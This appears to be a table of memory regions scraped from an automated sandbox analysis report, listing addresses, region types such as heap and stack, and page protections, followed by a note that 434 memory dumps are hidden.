||
|
A5D0000
|
heap
|
page read and write
|
||
|
23E3000
|
heap
|
page read and write
|
||
|
36ED000
|
heap
|
page read and write
|
||
|
374E000
|
heap
|
page read and write
|
||
|
19AC0F69000
|
heap
|
page read and write
|
||
|
29F2000
|
heap
|
page read and write
|
||
|
23F0000
|
trusted library allocation
|
page read and write
|
||
|
231301E5000
|
heap
|
page read and write
|
||
|
5B13000
|
heap
|
page read and write
|
||
|
201A34F5000
|
heap
|
page read and write
|
||
|
5AF6000
|
heap
|
page read and write
|
||
|
2850000
|
heap
|
page read and write
|
||
|
A764000
|
trusted library allocation
|
page read and write
|
||
|
19AC0D60000
|
heap
|
page read and write
|
||
|
3787000
|
heap
|
page read and write
|
||
|
373B000
|
heap
|
page read and write
|
||
|
19AC0EB5000
|
heap
|
page read and write
|
||
|
4DE28FF000
|
stack
|
page read and write
|
||
|
29F6000
|
heap
|
page read and write
|
||
|
25617A40000
|
heap
|
page read and write
|
||
|
4DE26FF000
|
stack
|
page read and write
|
||
|
7FFBBC704000
|
unkown
|
page readonly
|
||
|
2CDF9760000
|
heap
|
page read and write
|
||
|
55B0000
|
heap
|
page read and write
|
||
|
19AC0EF0000
|
heap
|
page read and write
|
||
|
2CDF9659000
|
heap
|
page read and write
|
||
|
6834000
|
heap
|
page read and write
|
||
|
19AC0E60000
|
heap
|
page read and write
|
||
|
35AE000
|
stack
|
page read and write
|
||
|
9BBE000
|
heap
|
page read and write
|
||
|
A760000
|
trusted library allocation
|
page read and write
|
||
|
5B1A000
|
heap
|
page read and write
|
||
|
2920000
|
heap
|
page read and write
|
||
|
3774000
|
heap
|
page read and write
|
||
|
5B13000
|
heap
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
19AC0E40000
|
heap
|
page read and write
|
||
|
5AD4000
|
heap
|
page read and write
|
||
|
2A1C000
|
heap
|
page read and write
|
||
|
5B16000
|
heap
|
page read and write
|
||
|
374D000
|
heap
|
page read and write
|
||
|
659E000
|
stack
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
36FD000
|
heap
|
page read and write
|
||
|
9FF0000
|
heap
|
page read and write
|
||
|
3745000
|
heap
|
page read and write
|
||
|
25617A10000
|
heap
|
page read and write
|
||
|
5C50000
|
trusted library allocation
|
page read and write
|
||
|
9281CFA000
|
stack
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
201A33DF000
|
heap
|
page read and write
|
||
|
29C8000
|
heap
|
page read and write
|
||
|
378C000
|
heap
|
page read and write
|
||
|
25617A20000
|
heap
|
page read and write
|
||
|
5B13000
|
heap
|
page read and write
|
||
|
4636000
|
heap
|
page read and write
|
||
|
4F7C000
|
stack
|
page read and write
|
||
|
2312FE40000
|
heap
|
page read and write
|
||
|
29FC000
|
heap
|
page read and write
|
||
|
58C0000
|
heap
|
page read and write
|
||
|
29ED000
|
heap
|
page read and write
|
||
|
29FC000
|
heap
|
page read and write
|
||
|
3785000
|
heap
|
page read and write
|
||
|
26F7000
|
stack
|
page read and write
|
||
|
9FE0000
|
heap
|
page read and write
|
||
|
2CDF9630000
|
heap
|
page read and write
|
||
|
35F0000
|
heap
|
page read and write
|
||
|
38F0000
|
heap
|
page read and write
|
||
|
7FFBBC700000
|
unkown
|
page readonly
|
||
|
29E5000
|
heap
|
page read and write
|
||
|
201A3420000
|
heap
|
page read and write
|
||
|
2A42000
|
heap
|
page read and write
|
||
|
2A3A000
|
heap
|
page read and write
|
||
|
5B0C000
|
heap
|
page read and write
|
||
|
73743EF000
|
stack
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
256195C0000
|
heap
|
page read and write
|
||
|
2826000
|
heap
|
page read and write
|
||
|
9B50000
|
heap
|
page read and write
|
||
|
19AC0FC3000
|
heap
|
page read and write
|
||
|
685D000
|
heap
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
4E3E000
|
stack
|
page read and write
|
||
|
3782000
|
heap
|
page read and write
|
||
|
374E000
|
heap
|
page read and write
|
||
|
6866000
|
heap
|
page read and write
|
||
|
A5CF000
|
stack
|
page read and write
|
||
|
5B0B000
|
heap
|
page read and write
|
||
|
6866000
|
heap
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
2312FE50000
|
heap
|
page read and write
|
||
|
3490000
|
trusted library allocation
|
page read and write
|
||
|
9C8E000
|
stack
|
page read and write
|
||
|
9B61000
|
heap
|
page read and write
|
||
|
6866000
|
heap
|
page read and write
|
||
|
1C83AFF000
|
stack
|
page read and write
|
||
|
4DE267F000
|
stack
|
page read and write
|
||
|
7FFBBC700000
|
unkown
|
page readonly
|
||
|
192CA580000
|
heap
|
page read and write
|
||
|
928191E000
|
stack
|
page read and write
|
||
|
3747000
|
heap
|
page read and write
|
||
|
192CA410000
|
heap
|
page read and write
|
||
|
A980000
|
heap
|
page read and write
|
||
|
377A000
|
heap
|
page read and write
|
||
|
9281896000
|
stack
|
page read and write
|
||
|
3725000
|
heap
|
page read and write
|
||
|
36FB000
|
heap
|
page read and write
|
||
|
29DB000
|
heap
|
page read and write
|
||
|
2A2B000
|
heap
|
page read and write
|
||
|
29A7000
|
heap
|
page read and write
|
||
|
685C000
|
heap
|
page read and write
|
||
|
53E4000
|
heap
|
page read and write
|
||
|
66DF000
|
stack
|
page read and write
|
||
|
4630000
|
heap
|
page read and write
|
||
|
29FC000
|
heap
|
page read and write
|
||
|
686C000
|
heap
|
page read and write
|
||
|
9B60000
|
heap
|
page read and write
|
||
|
36D1000
|
heap
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
A25D000
|
stack
|
page read and write
|
||
|
671D000
|
stack
|
page read and write
|
||
|
6866000
|
heap
|
page read and write
|
||
|
2F6A000
|
stack
|
page read and write
|
||
|
374D000
|
heap
|
page read and write
|
||
|
9B7F000
|
heap
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
7FFBBC704000
|
unkown
|
page readonly
|
||
|
29E2000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
375C000
|
heap
|
page read and write
|
||
|
19AC0F14000
|
heap
|
page read and write
|
||
|
2A1C000
|
heap
|
page read and write
|
||
|
3725000
|
heap
|
page read and write
|
||
|
4DE29FF000
|
stack
|
page read and write
|
||
|
4634000
|
heap
|
page read and write
|
||
|
4F3F000
|
stack
|
page read and write
|
||
|
3772000
|
heap
|
page read and write
|
||
|
3747000
|
heap
|
page read and write
|
||
|
3742000
|
heap
|
page read and write
|
||
|
5AD0000
|
heap
|
page read and write
|
||
|
5590000
|
heap
|
page read and write
|
||
|
25617AE8000
|
heap
|
page read and write
|
||
|
373B000
|
heap
|
page read and write
|
||
|
34A0000
|
heap
|
page read and write
|
||
|
6866000
|
heap
|
page read and write
|
||
|
1C83A7C000
|
stack
|
page read and write
|
||
|
36F2000
|
heap
|
page read and write
|
||
|
29C8000
|
heap
|
page read and write
|
||
|
378D000
|
heap
|
page read and write
|
||
|
29FC000
|
heap
|
page read and write
|
||
|
2A2B000
|
heap
|
page read and write
|
||
|
25617EA5000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
9B6E000
|
heap
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
36F5000
|
heap
|
page read and write
|
||
|
19AC0EFF000
|
heap
|
page read and write
|
||
|
23E0000
|
heap
|
page read and write
|
||
|
29F7000
|
heap
|
page read and write
|
||
|
7FFBBC701000
|
unkown
|
page execute read
|
||
|
5AAE000
|
stack
|
page read and write
|
||
|
53E0000
|
heap
|
page read and write
|
||
|
5B20000
|
heap
|
page read and write
|
||
|
2958000
|
heap
|
page read and write
|
||
|
2A2B000
|
heap
|
page read and write
|
||
|
58BC000
|
stack
|
page read and write
|
||
|
9B7F000
|
heap
|
page read and write
|
||
|
9B60000
|
heap
|
page read and write
|
||
|
29EF000
|
heap
|
page read and write
|
||
|
5B0D000
|
heap
|
page read and write
|
||
|
3789000
|
heap
|
page read and write
|
||
|
38FA000
|
heap
|
page read and write
|
||
|
372C000
|
heap
|
page read and write
|
||
|
2A39000
|
heap
|
page read and write
|
||
|
3742000
|
heap
|
page read and write
|
||
|
6846000
|
heap
|
page read and write
|
||
|
2981000
|
heap
|
page read and write
|
||
|
2855000
|
heap
|
page read and write
|
||
|
6871000
|
heap
|
page read and write
|
||
|
192CA330000
|
heap
|
page read and write
|
||
|
29A7000
|
heap
|
page read and write
|
||
|
36FB000
|
heap
|
page read and write
|
||
|
201A3350000
|
heap
|
page read and write
|
||
|
201A3330000
|
heap
|
page read and write
|
||
|
375C000
|
heap
|
page read and write
|
||
|
2312FE70000
|
heap
|
page read and write
|
||
|
3785000
|
heap
|
page read and write
|
||
|
3747000
|
heap
|
page read and write
|
||
|
29EB000
|
heap
|
page read and write
|
||
|
280000
|
heap
|
page read and write
|
||
|
9B5C000
|
heap
|
page read and write
|
||
|
7FFBBC701000
|
unkown
|
page execute read
|
||
|
375C000
|
heap
|
page read and write
|
||
|
2A46000
|
heap
|
page read and write
|
||
|
2A42000
|
heap
|
page read and write
|
||
|
F4C096C000
|
stack
|
page read and write
|
||
|
296E000
|
heap
|
page read and write
|
||
|
685B000
|
heap
|
page read and write
|
||
|
4A50000
|
heap
|
page read and write
|
||
|
5B13000
|
heap
|
page read and write
|
||
|
374A000
|
heap
|
page read and write
|
||
|
29EB000
|
heap
|
page read and write
|
||
|
CF155FF000
|
stack
|
page read and write
|
||
|
192CA585000
|
heap
|
page read and write
|
||
|
21A000
|
stack
|
page read and write
|
||
|
29C8000
|
heap
|
page read and write
|
||
|
9E24000
|
trusted library allocation
|
page read and write
|
||
|
2A1C000
|
heap
|
page read and write
|
||
|
376C000
|
heap
|
page read and write
|
||
|
65DE000
|
stack
|
page read and write
|
||
|
A4CE000
|
stack
|
page read and write
|
||
|
4DE287E000
|
stack
|
page read and write
|
||
|
9B9A000
|
heap
|
page read and write
|
||
|
9B93000
|
heap
|
page read and write
|
||
|
376A000
|
heap
|
page read and write
|
||
|
2981000
|
heap
|
page read and write
|
||
|
2A2B000
|
heap
|
page read and write
|
||
|
2A1C000
|
heap
|
page read and write
|
||
|
685E000
|
heap
|
page read and write
|
||
|
685B000
|
heap
|
page read and write
|
||
|
9281FFB000
|
stack
|
page read and write
|
||
|
6846000
|
heap
|
page read and write
|
||
|
299A000
|
heap
|
page read and write
|
||
|
192CBE50000
|
heap
|
page read and write
|
||
|
F4C09EF000
|
stack
|
page read and write
|
||
|
344E000
|
stack
|
page read and write
|
||
|
686C000
|
heap
|
page read and write
|
||
|
299A000
|
heap
|
page read and write
|
||
|
2A1C000
|
heap
|
page read and write
|
||
|
53E6000
|
heap
|
page read and write
|
||
|
36A8000
|
heap
|
page read and write
|
||
|
9E20000
|
trusted library allocation
|
page read and write
|
||
|
373E000
|
heap
|
page read and write
|
||
|
2CDF9650000
|
heap
|
page read and write
|
||
|
29F6000
|
heap
|
page read and write
|
||
|
2A31000
|
heap
|
page read and write
|
||
|
5B13000
|
heap
|
page read and write
|
||
|
374A000
|
heap
|
page read and write
|
||
|
3763000
|
heap
|
page read and write
|
||
|
5B11000
|
heap
|
page read and write
|
||
|
6866000
|
heap
|
page read and write
|
||
|
9B7F000
|
heap
|
page read and write
|
||
|
374E000
|
heap
|
page read and write
|
||
|
192CA530000
|
heap
|
page read and write
|
||
|
9B5D000
|
heap
|
page read and write
|
||
|
55B3000
|
heap
|
page read and write
|
||
|
19AC2E20000
|
heap
|
page read and write
|
||
|
7FFBBC709000
|
unkown
|
page read and write
|
||
|
192CA438000
|
heap
|
page read and write
|
||
|
3768000
|
heap
|
page read and write
|
||
|
53EF000
|
heap
|
page read and write
|
||
|
376C000
|
heap
|
page read and write
|
||
|
374A000
|
heap
|
page read and write
|
||
|
4900000
|
heap
|
page read and write
|
There are 434 hidden memdumps, click here to show them.